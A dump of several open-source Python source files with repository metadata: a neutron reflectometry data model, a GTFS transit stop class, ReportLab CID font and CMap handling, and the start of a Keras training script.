Variance in the measured source power
monitor_rate (counts/second)
For normalizing by counts when only count time is recorded, we
need an estimate of the monitor rate during the measurement.
"""
properties = ['distance','sampled_fraction','counts','start_time',
'count_time','time_step','time_of_flight','base',
'monitor_rate','source_power','source_power_units']
distance = None
sampled_fraction = None
counts = None
start_time = None
count_time = None
time_step = 1 # Default to nearest second
time_of_flight = None
base = 'counts'
source_power = 1 # Default to 1 MW power
source_power_units = "MW"
source_power_variance = 0
monitor_rate = 0 # counts/sec
def __init__(self, **kw): _set(self,kw)
def __str__(self): return _str(self)
class Moderator(object):
"""
Time of flight calculations require information about the moderator.
Primarily this is the length of the flight path from moderator to
monitor or detector required to compute wavelength.
Moderator temperature is also recorded. The user should probably
be warned when working with datasets with different moderator
temperatures since this is likely to affect the wavelength
spectrum of the beam.
distance (metre)
Distance from moderator to sample. This is negative since the
monitor is certainly before the sample.
temperature (kelvin)
Temperature of the moderator
type (string)
For information only at this point.
"""
properties = ['distance','temperature','type']
distance = None
temperature = None
type = 'Unknown'
def __init__(self, **kw): _set(self, kw)
def __str__(self): return _str(self)
class Warning(object):
"""
A warning is an information message and a possible set of actions to
take in response to the warning.
The user interface can query the message and the action list, generate
a dialog on the basis of the information. Actions may have associated
attributes that need to be set for the action to complete.
"""
pass
class WarningWavelength(Warning):
"""
Unexpected wavelength warning.
This warning is attached to any dataset which has an unexpected
wavelength stored in the file (more than 1% different from the
default wavelength for the instrument).
Various actions can be done in response to the warning, including
always taking the default value for this instrument, overriding for
every value in the dataset
"""
pass
class ReflData(object):
"""
slit1,slit2 (Slit)
Presample slits
slit3,slit4 (Slit)
Post sample slits
sample
Sample geometry
detector
Detector geometry, efficiency and counts
monitor
Counts and/or durations
polarization
'' unpolarized
'+' spin up
'-' spin down
'++','--' non-spin-flip
'-+','+-' spin flip
points
For scanning instruments, the number of measurements.
channels
For time of flight, the number of time channels. For white
beam instruments, the number of analysers.
reversed (False)
True if the measurement is reversed, in which case sample
and detector angles need to be negated and pixel directions
reversed when computing pixel coordinates.
roi
Region of interest on the detector.
display_monitor (counts)
Default monitor to use when displaying data from this dataset
File details
============
instrument (string)
Name of a particular instrument
probe ('neutron' or 'xray')
Type of radiation used to probe the sample.
path (string)
Location of the datafile
entry (string)
Entry identifier if more than one entry per file
name (string)
Name of the dataset. This may be a combination of filename and
entry number.
description (string)
Description of the entry.
date (timestamp)
Starting date and time of the measurement.
duration (second)
Duration of the measurement.
warnings
List of warnings generated when the file was loaded
intent (string)
Purpose of the measurement.
intensity: Normalization scan for computing absolute reflection
specular: Specular intensity measurement
q_offset: Background measurement, offset from Qx=0 in Q
sample_offset: Background measurement, sample rotated
detector_offset: Background measurement, detector moved
slice: Slice through Qx-Qz
area: Measurement of a region of Qx-Qz plane
alignment: Sample alignment measurement
other: Some other kind of measurement
Format specific fields (ignored by reduction software)
======================
file (handle)
Format specific file handle, for actions like showing the summary,
updating the data and reading the frames.
"""
properties = ['instrument','geometry','probe','points','channels',
'name','description','date','duration','attenuator',
'polarization','reversed','warnings','path','entry']
geometry = "vertical"
probe = "unknown"
format = "unknown"
path = "unknown"
entry = ""
points = 1
channels = 1
name = ""
description = ""
date = datetime.datetime(1970,1,1)
duration = 0
file = None
attenuator = 1.
polarization = ''
reversed = False
warnings = None
messages = None
def _getdR(self): return sqrt(self.varR)
def _setdR(self, dR): self.varR = dR**2
dR = property(_getdR,_setdR)
# Data representation for generic plotter as (x,y,z,v)
# TODO: subclass Data so we get pixel edges calculations
def _getx(self): return self.Qz
def _gety(self): return self.Qx
def _getz(self): return self.Qy
def _getv(self): return self.R
def _getdv(self): return sqrt(self.varR)
x,xlabel,xunits = property(_getx),"Qx","inv A"
y,ylabel,yunits = property(_gety),"Qy","inv A"
z,zlabel,zunits = property(_getz),"Qz","inv A"
v,dv = property(_getv),property(_getdv)
# vlabel and vunits depend on monitor normalization
def __init__(self, **kw):
# Note: because _set is ahead of the following, the caller will not
# be able to specify sample, slit, detector or monitor on creation,
# but will instead have to use those items provided by the class.
_set(self,kw)
self.sample = Sample()
self.slit1 = Slit()
self.slit2 = Slit()
self.slit3 = Slit()
self.slit4 = Slit()
self.detector = Detector()
self.monitor = Monitor()
self.moderator = Moderator()
self.warnings = []
self.roi = ROI()
self.messages = []
def __str__(self):
base = [_str(self)]
others = [str(s) for s in [self.slit1,self.slit2,self.slit3,self.slit4,
self.sample,self.detector,self.monitor,
self.roi]]
return "\n".join(base+others)
def warn(self,msg):
"""Record a warning that should be displayed to the user"""
self.warnings.append(msg)
def log(self,msg):
"""Record corrections that have been applied to the data"""
self.messages.append(msg)
def apply(self,correction):
"""Allow alternative syntax: data.apply(correction)"""
self.log(str(correction))
correction.apply(self)
def resetQ(self):
"""Recompute Qx,Qz from geometry and wavelength"""
A,B = self.sample.angle_x,self.detector.angle_x
L = self.detector.wavelength
Qx,Qz = ABL_to_QxQz(A,B,L)
self.Qx,self.Qz = Qx,Qz
def _str(object):
"""
Helper function: document data object by convert attributes listed in
properties into a string.
"""
cls = object.__class__.__name__
props = [a+"="+str(getattr(object,a)) for a in object.properties]
return "%s %s"%(cls,"\n ".join(props))
def _set(object,kw):
'''
Helper function: distribute the __init__ keyward paramters to
individual attributes of an object, raising AttributeError if
the class does not define the given attribute.
Example:
def __init__(self, **kw): _set(self,kw)
'''
for k,v in kw.iteritems():
if hasattr(self,k):
setattr(object,k,v)
else:
raise AttributeError, "Unknown attribute %s"%(k)
# Ignore the remainder of this file --- I don't yet have the computational
# interface set up.
"""
Computed values
===============
edges_x (metric=['pixel'|'mm'|'degrees'|'radians'],frame=0)
Returns the nx+1 pixel edges of the detector in the given units.
In distance units, this is the distance relative to the center
of the detector arm.
edges_y (metric=['pixel'|'mm'|'degrees'|'radians'],frame=0)
Returns the ny+1 pixel edges of the detector in the given units.
def resolution(self):
return
"""
# === Interaction with individual frames ===
class Reader(ReflData):
def numframes(self):
"""
Return the number of detector frames available.
"""
return self.channels*self.points
def loadframes(self):
"""
Convert raw frames into a form suitable for display.
"""
# Hold a reference to the counts so that they are not purged
# from memory during the load operation.
xlo,xhi,ylo,yhi = self.roi
counts = self.detector.counts
nq = zhi-zlo+1
nx = self.detector.shape[0]
ny = self.detector.shape[1]
if ny == 1:
self.zx = counts[zlo:zhi+1,:]
else:
xy = numpy.zeros((nx,ny),dtype='float32')
zx = numpy.zeros((nq,nx),dtype='float32')
self.framerange = Limits() # Keep track of total range
for i in range(zlo,zhi):
v = self.frame(i)
self.framerange.add(v,dv=sqrt(v))
xy += v
zx[i-zlo,:] = numpy.sum(v[:,ylo:yhi],axis=1)
self.xy = xy
self.zx = zx
def frame(self,index):
"""
Return the 2-D detector frame for the given index k. For
multichannel instruments, index is the index for the channel
otherwise index is the measurement number.
The result is undefined if the detector is not a 2-D detector.
"""
if self.channels > 1:
return self.detector.counts[:,index]
else:
return self.detector.counts[index,:]
def shadow(f, beamstop, frame):
"""
Construct a mask for the detector frame indicating which pixels
are outside the shadow of the beamstop. This pixels should not
be used when estimating sample background. Note that this becomes
considerably more tricky when angular divergence and gravity
are taken into account. The mask should include enough of the
penumbra that these effects can be ignored.
Currently this function returns no shadow.
"""
mask = numpy.ones(self.detector.shape,'int8')
if beamstop.ispresent:
# calculate location of the beamstop centre relative to
# the detector.
pass
return mask
|
reflectometry/osrefl
|
osrefl/loaders/reduction/refldata.py
|
Python
|
bsd-3-clause
| 32,276
|
[
"Gaussian"
] |
d2523f02c20d5392cd7eae960499cb9eab76e203ccc80a907457087af4feb0ee
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from gtfsobjectbase import GtfsObjectBase
import problems as problems_module
import util
class Stop(GtfsObjectBase):
"""Represents a single stop. A stop must have a latitude, longitude and name.
Callers may assign arbitrary values to instance attributes.
Stop.ParseAttributes validates attributes according to GTFS and converts some
into native types. ParseAttributes may delete invalid attributes.
Accessing an attribute that is a column in GTFS will return None if this
object does not have a value or it is ''.
A Stop object acts like a dict with string values.
Attributes:
stop_lat: a float representing the latitude of the stop
stop_lon: a float representing the longitude of the stop
All other attributes are strings.
"""
_REQUIRED_FIELD_NAMES = ['stop_id', 'stop_name', 'stop_lat', 'stop_lon']
_FIELD_NAMES = _REQUIRED_FIELD_NAMES + \
['stop_desc', 'zone_id', 'stop_url', 'stop_code',
'location_type', 'parent_station', 'stop_timezone',
'wheelchair_boarding', 'stop_country', 'stop_country_code',
'stop_city', 'stop_admin_level1', 'stop_admin_level2',
'stop_admin_level3', 'border', 'platform_code']
_TABLE_NAME = 'stops'
LOCATION_TYPE_STATION = 1
def __init__(self, lat=None, lng=None, name=None, stop_id=None,
field_dict=None, stop_code=None):
"""Initialize a new Stop object.
Args:
field_dict: A dictionary mapping attribute name to unicode string
lat: a float, ignored when field_dict is present
lng: a float, ignored when field_dict is present
name: a string, ignored when field_dict is present
stop_id: a string, ignored when field_dict is present
stop_code: a string, ignored when field_dict is present
"""
self._schedule = None
if field_dict:
if isinstance(field_dict, self.__class__):
# Special case so that we don't need to re-parse the attributes to
# native types iteritems returns all attributes that don't start with _
for k, v in field_dict.iteritems():
self.__dict__[k] = v
else:
self.__dict__.update(field_dict)
else:
if lat is not None:
self.stop_lat = lat
if lng is not None:
self.stop_lon = lng
if name is not None:
self.stop_name = name
if stop_id is not None:
self.stop_id = stop_id
if stop_code is not None:
self.stop_code = stop_code
def GetTrips(self, schedule=None):
"""Return iterable containing trips that visit this stop."""
return [trip for trip, ss in self._GetTripSequence(schedule)]
def _GetTripSequence(self, schedule=None):
"""Return a list of (trip, stop_sequence) for all trips visiting this stop.
A trip may be in the list multiple times with different index.
stop_sequence is an integer.
Args:
schedule: Deprecated, do not use.
"""
if schedule is None:
schedule = getattr(self, "_schedule", None)
if schedule is None:
warnings.warn("No longer supported. _schedule attribute is used to get "
"stop_times table", DeprecationWarning)
cursor = schedule._connection.cursor()
cursor.execute("SELECT trip_id,stop_sequence FROM stop_times "
"WHERE stop_id=?",
(self.stop_id, ))
return [(schedule.GetTrip(row[0]), row[1]) for row in cursor]
def _GetTripIndex(self, schedule=None):
"""Return a list of (trip, index).
trip: a Trip object
index: an offset in trip.GetStopTimes()
"""
trip_index = []
for trip, sequence in self._GetTripSequence(schedule):
for index, st in enumerate(trip.GetStopTimes()):
if st.stop_sequence == sequence:
trip_index.append((trip, index))
break
else:
raise RuntimeError("stop_sequence %d not found in trip_id %s" %
sequence, trip.trip_id)
return trip_index
def GetStopTimeTrips(self, schedule=None):
"""Return a list of (time, (trip, index), is_timepoint).
time: an integer. It might be interpolated.
trip: a Trip object.
index: the offset of this stop in trip.GetStopTimes(), which may be
different from the stop_sequence.
is_timepoint: a bool
"""
time_trips = []
for trip, index in self._GetTripIndex(schedule):
secs, stoptime, is_timepoint = trip.GetTimeInterpolatedStops()[index]
time_trips.append((secs, (trip, index), is_timepoint))
return time_trips
def __getattr__(self, name):
"""Return None or the default value if name is a known attribute.
This method is only called when name is not found in __dict__.
"""
if name == "location_type":
return 0
elif name == "trip_index":
return self._GetTripIndex()
else:
return super(Stop, self).__getattr__(name)
def ValidateStopLatitude(self, problems):
if self.stop_lat is not None:
value = self.stop_lat
try:
if not isinstance(value, (float, int)):
self.stop_lat = util.FloatStringToFloat(value, problems)
except (ValueError, TypeError):
problems.InvalidValue('stop_lat', value)
del self.stop_lat
else:
if self.stop_lat > 90 or self.stop_lat < -90:
problems.InvalidValue('stop_lat', value)
def ValidateStopLongitude(self, problems):
if self.stop_lon is not None:
value = self.stop_lon
try:
if not isinstance(value, (float, int)):
self.stop_lon = util.FloatStringToFloat(value, problems)
except (ValueError, TypeError):
problems.InvalidValue('stop_lon', value)
del self.stop_lon
else:
if self.stop_lon > 180 or self.stop_lon < -180:
problems.InvalidValue('stop_lon', value)
def ValidateStopUrl(self, problems):
value = self.stop_url
if value and not util.ValidateURL(value, 'stop_url', problems):
del self.stop_url
def ValidateStopLocationType(self, problems):
value = self.location_type
if value == '':
self.location_type = 0
else:
try:
self.location_type = int(value)
except (ValueError, TypeError):
problems.InvalidValue('location_type', value)
del self.location_type
else:
if self.location_type not in (0, 1):
problems.InvalidValue('location_type', value,
type=problems_module.TYPE_WARNING)
def ValidateStopRequiredFields(self, problems):
for required in self._REQUIRED_FIELD_NAMES:
if util.IsEmpty(getattr(self, required, None)):
self._ReportMissingRequiredField(problems, required)
def _ReportMissingRequiredField(self, problems, required):
# TODO: For now we are keeping the API stable but it would be cleaner to
# treat whitespace stop_id as invalid, instead of missing
problems.MissingValue(required)
setattr(self, required, None)
def ValidateStopNotTooCloseToOrigin(self, problems):
if (self.stop_lat is not None and self.stop_lon is not None and
abs(self.stop_lat) < 1.0) and (abs(self.stop_lon) < 1.0):
problems.InvalidValue('stop_lat', self.stop_lat,
'Stop location too close to 0, 0',
type=problems_module.TYPE_WARNING)
def ValidateStopDescriptionAndNameAreDifferent(self, problems):
if (self.stop_desc and self.stop_name and
not util.IsEmpty(self.stop_desc) and
self.stop_name.strip().lower() == self.stop_desc.strip().lower()):
problems.InvalidValue('stop_desc', self.stop_desc,
'stop_desc should not be the same as stop_name',
type=problems_module.TYPE_WARNING)
def ValidateStopIsNotStationWithParent(self, problems):
if self.parent_station and self.location_type == 1:
problems.InvalidValue('parent_station', self.parent_station,
'Stop row with location_type=1 (a station) must '
'not have a parent_station')
def ValidateStopTimezone(self, problems):
# Entrances or other child stops (having a parent station) must not have a
# stop_timezone.
util.ValidateTimezone(self.stop_timezone, 'stop_timezone', problems)
# if (not util.IsEmpty(self.parent_station) and
# not util.IsEmpty(self.stop_timezone)):
# problems.InvalidValue('stop_timezone', self.stop_timezone,
# reason='a stop having a parent stop must not have a stop_timezone',
# type=problems_module.TYPE_WARNING)
def ValidateWheelchairBoarding(self, problems):
if self.wheelchair_boarding:
util.ValidateYesNoUnknown(
self.wheelchair_boarding, 'wheelchair_boarding', problems)
def ValidateBeforeAdd(self, problems):
# First check that all required fields are present because ParseAttributes
# may remove invalid attributes.
self.ValidateStopRequiredFields(problems)
#If value is valid for attribute name store it.
#If value is not valid call problems. Return a new value of the correct type
#or None if value couldn't be converted.
self.ValidateStopLatitude(problems)
self.ValidateStopLongitude(problems)
self.ValidateStopUrl(problems)
self.ValidateStopLocationType(problems)
self.ValidateStopTimezone(problems)
self.ValidateWheelchairBoarding(problems)
# Check that this object is consistent with itself
self.ValidateStopNotTooCloseToOrigin(problems)
self.ValidateStopDescriptionAndNameAreDifferent(problems)
self.ValidateStopIsNotStationWithParent(problems)
# None of these checks are blocking
return True
def ValidateAfterAdd(self, problems):
return
def Validate(self, problems=problems_module.default_problem_reporter):
self.ValidateBeforeAdd(problems)
self.ValidateAfterAdd(problems)
def AddToSchedule(self, schedule, problems):
schedule.AddStopObject(self, problems)
|
bileto/transitfeed
|
transitfeed/stop.py
|
Python
|
apache-2.0
| 10,635
|
[
"VisIt"
] |
085e20ebc847613bd978ed29d3f0858aac0d422499c580196f83eeebbcb51e6e
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/pdfbase/cidfonts.py
#$Header $
__version__=''' $Id: cidfonts.py 3710 2010-05-14 16:00:58Z rgbecker $ '''
__doc__="""CID (Asian multi-byte) font support.
This defines classes to represent CID fonts. They know how to calculate
their own width and how to write themselves into PDF files."""
import os
from types import ListType, TupleType, DictType
from string import find, split, strip
import marshal
import time
try:
from hashlib import md5
except ImportError:
from md5 import md5
import reportlab
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase._cidfontdata import allowedTypeFaces, allowedEncodings, CIDFontInfo, \
defaultUnicodeEncodings, widthsByUnichar
from reportlab.pdfgen.canvas import Canvas
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase.pdfutils import _escape
from reportlab.rl_config import CMapSearchPath
#quick hackery for 2.0 release. Now we always do unicode, and have built in
#the CMAP data, any code to load CMap files is not needed.
DISABLE_CMAP = True
def findCMapFile(name):
"Returns full filename, or raises error"
for dirname in CMapSearchPath:
cmapfile = dirname + os.sep + name
if os.path.isfile(cmapfile):
#print "found", cmapfile
return cmapfile
raise IOError, 'CMAP file for encodings "%s" not found!' % name
def structToPDF(structure):
"Converts deeply nested structure to PDFdoc dictionary/array objects"
if type(structure) is DictType:
newDict = {}
for k, v in structure.items():
newDict[k] = structToPDF(v)
return pdfdoc.PDFDictionary(newDict)
elif type(structure) in (ListType, TupleType):
newList = []
for elem in structure:
newList.append(structToPDF(elem))
return pdfdoc.PDFArray(newList)
else:
return structure
class CIDEncoding(pdfmetrics.Encoding):
"""Multi-byte encoding. These are loaded from CMAP files.
A CMAP file is like a mini-codec. It defines the correspondence
between code points in the (multi-byte) input data and Character
IDs. """
# aims to do similar things to Brian Hooper's CMap class,
# but I could not get it working and had to rewrite.
# also, we should really rearrange our current encoding
# into a SingleByteEncoding since many of its methods
# should not apply here.
def __init__(self, name, useCache=1):
self.name = name
self._mapFileHash = None
self._codeSpaceRanges = []
self._notDefRanges = []
self._cmap = {}
self.source = None
if not DISABLE_CMAP:
if useCache:
from reportlab.lib.utils import get_rl_tempdir
fontmapdir = get_rl_tempdir('FastCMAPS')
if os.path.isfile(fontmapdir + os.sep + name + '.fastmap'):
self.fastLoad(fontmapdir)
self.source = fontmapdir + os.sep + name + '.fastmap'
else:
self.parseCMAPFile(name)
self.source = 'CMAP: ' + name
self.fastSave(fontmapdir)
else:
self.parseCMAPFile(name)
def _hash(self, text):
hasher = md5()
hasher.update(text)
return hasher.digest()
def parseCMAPFile(self, name):
"""This is a tricky one as CMAP files are Postscript
ones. Some refer to others with a 'usecmap'
command"""
#started = time.clock()
cmapfile = findCMapFile(name)
# this will CRAWL with the unicode encodings...
rawdata = open(cmapfile, 'r').read()
self._mapFileHash = self._hash(rawdata)
#if it contains the token 'usecmap', parse the other
#cmap file first....
usecmap_pos = find(rawdata, 'usecmap')
if usecmap_pos > -1:
#they tell us to look in another file
#for the code space ranges. The one
# to use will be the previous word.
chunk = rawdata[0:usecmap_pos]
words = split(chunk)
otherCMAPName = words[-1]
#print 'referred to another CMAP %s' % otherCMAPName
self.parseCMAPFile(otherCMAPName)
# now continue parsing this, as it may
# override some settings
words = split(rawdata)
while words != []:
if words[0] == 'begincodespacerange':
words = words[1:]
while words[0] != 'endcodespacerange':
strStart, strEnd, words = words[0], words[1], words[2:]
start = int(strStart[1:-1], 16)
end = int(strEnd[1:-1], 16)
self._codeSpaceRanges.append((start, end),)
elif words[0] == 'beginnotdefrange':
words = words[1:]
while words[0] != 'endnotdefrange':
strStart, strEnd, strValue = words[0:3]
start = int(strStart[1:-1], 16)
end = int(strEnd[1:-1], 16)
value = int(strValue)
self._notDefRanges.append((start, end, value),)
words = words[3:]
elif words[0] == 'begincidrange':
words = words[1:]
while words[0] != 'endcidrange':
strStart, strEnd, strValue = words[0:3]
start = int(strStart[1:-1], 16)
end = int(strEnd[1:-1], 16)
value = int(strValue)
# this means that 'start' corresponds to 'value',
# start+1 corresponds to value+1 and so on up
# to end
offset = 0
while start + offset <= end:
self._cmap[start + offset] = value + offset
offset = offset + 1
words = words[3:]
else:
words = words[1:]
#finished = time.clock()
#print 'parsed CMAP %s in %0.4f seconds' % (self.name, finished - started)
def translate(self, text):
"Convert a string into a list of CIDs"
output = []
cmap = self._cmap
lastChar = ''
for char in text:
if lastChar != '':
#print 'convert character pair "%s"' % (lastChar + char)
num = ord(lastChar) * 256 + ord(char)
else:
#print 'convert character "%s"' % char
num = ord(char)
lastChar = char
found = 0
for low, high in self._codeSpaceRanges:
if low < num < high:
try:
cid = cmap[num]
#print '%d -> %d' % (num, cid)
except KeyError:
#not defined. Try to find the appropriate
# notdef character, or failing that return
# zero
cid = 0
for low2, high2, notdef in self._notDefRanges:
if low2 < num < high2:
cid = notdef
break
output.append(cid)
found = 1
break
if found:
lastChar = ''
else:
lastChar = char
return output
def fastSave(self, directory):
f = open(os.path.join(directory, self.name + '.fastmap'), 'wb')
marshal.dump(self._mapFileHash, f)
marshal.dump(self._codeSpaceRanges, f)
marshal.dump(self._notDefRanges, f)
marshal.dump(self._cmap, f)
f.close()
def fastLoad(self, directory):
started = time.clock()
f = open(os.path.join(directory, self.name + '.fastmap'), 'rb')
self._mapFileHash = marshal.load(f)
self._codeSpaceRanges = marshal.load(f)
self._notDefRanges = marshal.load(f)
self._cmap = marshal.load(f)
f.close()
finished = time.clock()
#print 'loaded %s in %0.4f seconds' % (self.name, finished - started)
def getData(self):
"""Simple persistence helper. Return a dict with all that matters."""
return {
'mapFileHash': self._mapFileHash,
'codeSpaceRanges': self._codeSpaceRanges,
'notDefRanges': self._notDefRanges,
'cmap': self._cmap,
}
class CIDTypeFace(pdfmetrics.TypeFace):
"""Multi-byte type face.
Conceptually similar to a single byte typeface,
but the glyphs are identified by a numeric Character
ID (CID) and not a glyph name. """
def __init__(self, name):
"""Initialised from one of the canned dictionaries in allowedEncodings
Or rather, it will be shortly..."""
pdfmetrics.TypeFace.__init__(self, name)
self._extractDictInfo(name)
def _extractDictInfo(self, name):
try:
fontDict = CIDFontInfo[name]
except KeyError:
raise KeyError, ("Unable to find information on CID typeface '%s'" % name +
"Only the following font names work:" + repr(allowedTypeFaces)
)
descFont = fontDict['DescendantFonts'][0]
self.ascent = descFont['FontDescriptor']['Ascent']
self.descent = descFont['FontDescriptor']['Descent']
self._defaultWidth = descFont['DW']
self._explicitWidths = self._expandWidths(descFont['W'])
# should really support self.glyphWidths, self.glyphNames
# but not done yet.
def _expandWidths(self, compactWidthArray):
"""Expands Adobe nested list structure to get a dictionary of widths.
Here is an example of such a structure.::
(
# starting at character ID 1, next n characters have the widths given.
1, (277,305,500,668,668,906,727,305,445,445,508,668,305,379,305,539),
# all Characters from ID 17 to 26 are 668 em units wide
17, 26, 668,
27, (305, 305, 668, 668, 668, 566, 871, 727, 637, 652, 699, 574, 555,
676, 687, 242, 492, 664, 582, 789, 707, 734, 582, 734, 605, 605,
641, 668, 727, 945, 609, 609, 574, 445, 668, 445, 668, 668, 590,
555, 609, 547, 602, 574, 391, 609, 582, 234, 277, 539, 234, 895,
582, 605, 602, 602, 387, 508, 441, 582, 562, 781, 531, 570, 555,
449, 246, 449, 668),
# these must be half width katakana and the like.
231, 632, 500
)
"""
data = compactWidthArray[:]
widths = {}
while data:
start, data = data[0], data[1:]
if type(data[0]) in (ListType, TupleType):
items, data = data[0], data[1:]
for offset in range(len(items)):
widths[start + offset] = items[offset]
else:
end, width, data = data[0], data[1], data[2:]
for idx in range(start, end+1):
widths[idx] = width
return widths
def getCharWidth(self, characterId):
return self._explicitWidths.get(characterId, self._defaultWidth)
class CIDFont(pdfmetrics.Font):
"Represents a built-in multi-byte font"
_multiByte = 1
def __init__(self, face, encoding):
assert face in allowedTypeFaces, "TypeFace '%s' not supported! Use any of these instead: %s" % (face, allowedTypeFaces)
self.faceName = face
#should cache in registry...
self.face = CIDTypeFace(face)
assert encoding in allowedEncodings, "Encoding '%s' not supported! Use any of these instead: %s" % (encoding, allowedEncodings)
self.encodingName = encoding
self.encoding = CIDEncoding(encoding)
#legacy hack doing quick cut and paste.
self.fontName = self.faceName + '-' + self.encodingName
self.name = self.fontName
# need to know if it is vertical or horizontal
self.isVertical = (self.encodingName[-1] == 'V')
#no substitutes initially
self.substitutionFonts = []
def formatForPdf(self, text):
encoded = _escape(text)
#print 'encoded CIDFont:', encoded
return encoded
def stringWidth(self, text, size, encoding=None):
"""This presumes non-Unicode input. UnicodeCIDFont wraps it for that context"""
cidlist = self.encoding.translate(text)
if self.isVertical:
#this part is "not checked!" but seems to work.
#assume each is 1000 ems high
return len(cidlist) * size
else:
w = 0
for cid in cidlist:
w = w + self.face.getCharWidth(cid)
return 0.001 * w * size
def addObjects(self, doc):
"""The explicit code in addMinchoObjects and addGothicObjects
will be replaced by something that pulls the data from
_cidfontdata.py in the next few days."""
internalName = 'F' + repr(len(doc.fontMapping)+1)
bigDict = CIDFontInfo[self.face.name]
bigDict['Name'] = '/' + internalName
bigDict['Encoding'] = '/' + self.encodingName
#convert to PDF dictionary/array objects
cidObj = structToPDF(bigDict)
# link into document, and add to font map
r = doc.Reference(cidObj, internalName)
fontDict = doc.idToObject['BasicFonts'].dict
fontDict[internalName] = r
doc.fontMapping[self.name] = '/' + internalName
class UnicodeCIDFont(CIDFont):
"""Wraps up CIDFont to hide explicit encoding choice;
encodes text for output as UTF16.
lang should be one of 'jpn',chs','cht','kor' for now.
if vertical is set, it will select a different widths array
and possibly glyphs for some punctuation marks.
halfWidth is only for Japanese.
>>> dodgy = UnicodeCIDFont('nonexistent')
Traceback (most recent call last):
...
KeyError: "don't know anything about CID font nonexistent"
>>> heisei = UnicodeCIDFont('HeiseiMin-W3')
>>> heisei.name
'HeiseiMin-W3'
>>> heisei.language
'jpn'
>>> heisei.encoding.name
'UniJIS-UCS2-H'
>>> #This is how PDF data gets encoded.
>>> print heisei.formatForPdf('hello')
\\000h\\000e\\000l\\000l\\000o
>>> tokyo = u'\u6771\u4AEC'
>>> print heisei.formatForPdf(tokyo)
gqJ\\354
"""
def __init__(self, face, isVertical=False, isHalfWidth=False):
#pass
try:
lang, defaultEncoding = defaultUnicodeEncodings[face]
except KeyError:
raise KeyError("don't know anything about CID font %s" % face)
#we know the languages now.
self.language = lang
#rebuilt encoding string. They follow rules which work
#for the 7 fonts provided.
enc = defaultEncoding[:-1]
if isHalfWidth:
enc = enc + 'HW-'
if isVertical:
enc = enc + 'V'
else:
enc = enc + 'H'
#now we can do the more general case
CIDFont.__init__(self, face, enc)
#self.encName = 'utf_16_le'
#it's simpler for unicode, just use the face name
self.name = self.fontName = face
self.vertical = isVertical
self.isHalfWidth = isHalfWidth
self.unicodeWidths = widthsByUnichar[self.name]
def formatForPdf(self, text):
#these ones should be encoded asUTF16 minus the BOM
from codecs import utf_16_be_encode
#print 'formatting %s: %s' % (type(text), repr(text))
if type(text) is not unicode:
text = text.decode('utf8')
utfText = utf_16_be_encode(text)[0]
encoded = _escape(utfText)
#print ' encoded:',encoded
return encoded
#
#result = _escape(encoded)
#print ' -> %s' % repr(result)
#return result
def stringWidth(self, text, size, encoding=None):
"Just ensure we do width test on characters, not bytes..."
if type(text) is type(''):
text = text.decode('utf8')
widths = self.unicodeWidths
return size * 0.001 * sum([widths.get(uch, 1000) for uch in text])
#return CIDFont.stringWidth(self, text, size, encoding)
def precalculate(cmapdir):
# crunches through all, making 'fastmap' files
import os
files = os.listdir(cmapdir)
for file in files:
if os.path.isfile(cmapdir + os.sep + self.name + '.fastmap'):
continue
try:
enc = CIDEncoding(file)
except:
print 'cannot parse %s, skipping' % enc
continue
enc.fastSave(cmapdir)
print 'saved %s.fastmap' % file
def test():
# only works if you have cirrect encodings on your box!
c = Canvas('test_japanese.pdf')
c.setFont('Helvetica', 30)
c.drawString(100,700, 'Japanese Font Support')
pdfmetrics.registerFont(CIDFont('HeiseiMin-W3','90ms-RKSJ-H'))
pdfmetrics.registerFont(CIDFont('HeiseiKakuGo-W5','90ms-RKSJ-H'))
# the two typefaces
c.setFont('HeiseiMin-W3-90ms-RKSJ-H', 16)
# this says "This is HeiseiMincho" in shift-JIS. Not all our readers
# have a Japanese PC, so I escaped it. On a Japanese-capable
# system, print the string to see Kanji
message1 = '\202\261\202\352\202\315\225\275\220\254\226\276\222\251\202\305\202\267\201B'
c.drawString(100, 675, message1)
c.save()
print 'saved test_japanese.pdf'
## print 'CMAP_DIR = ', CMAP_DIR
## tf1 = CIDTypeFace('HeiseiMin-W3')
## print 'ascent = ',tf1.ascent
## print 'descent = ',tf1.descent
## for cid in [1,2,3,4,5,18,19,28,231,1742]:
## print 'width of cid %d = %d' % (cid, tf1.getCharWidth(cid))
encName = '90ms-RKSJ-H'
enc = CIDEncoding(encName)
print message1, '->', enc.translate(message1)
f = CIDFont('HeiseiMin-W3','90ms-RKSJ-H')
print 'width = %0.2f' % f.stringWidth(message1, 10)
#testing all encodings
## import time
## started = time.time()
## import glob
## for encName in _cidfontdata.allowedEncodings:
## #encName = '90ms-RKSJ-H'
## enc = CIDEncoding(encName)
## print 'encoding %s:' % encName
## print ' codeSpaceRanges = %s' % enc._codeSpaceRanges
## print ' notDefRanges = %s' % enc._notDefRanges
## print ' mapping size = %d' % len(enc._cmap)
## finished = time.time()
## print 'constructed all encodings in %0.2f seconds' % (finished - started)
if __name__=='__main__':
import doctest
import cidfonts
doctest.testmod(cidfonts)
#test()
|
mattjmorrison/ReportLab
|
src/reportlab/pdfbase/cidfonts.py
|
Python
|
bsd-3-clause
| 18,903
|
[
"Brian"
] |
ee6021615cb37a942e9536c0bad00acc3f21dea7f18d6143e7e8ab8cb9622e50
|
from keras.models import Model, model_from_json
from keras.layers import Flatten, Dense, BatchNormalization, Dropout, Reshape, Permute, Activation, Input
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD, Adam
from keras.callbacks import CSVLogger, ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard
from keras import backend as K
import numpy as np
import h5py
import cv2
from glob import glob
from time import time
from os.path import isfile
from random import shuffle
import matplotlib.pyplot as plt
start_time = time()
# source activate deepenv1
# nohup python train.py &
# ps -ef | grep train.py
# kill UID
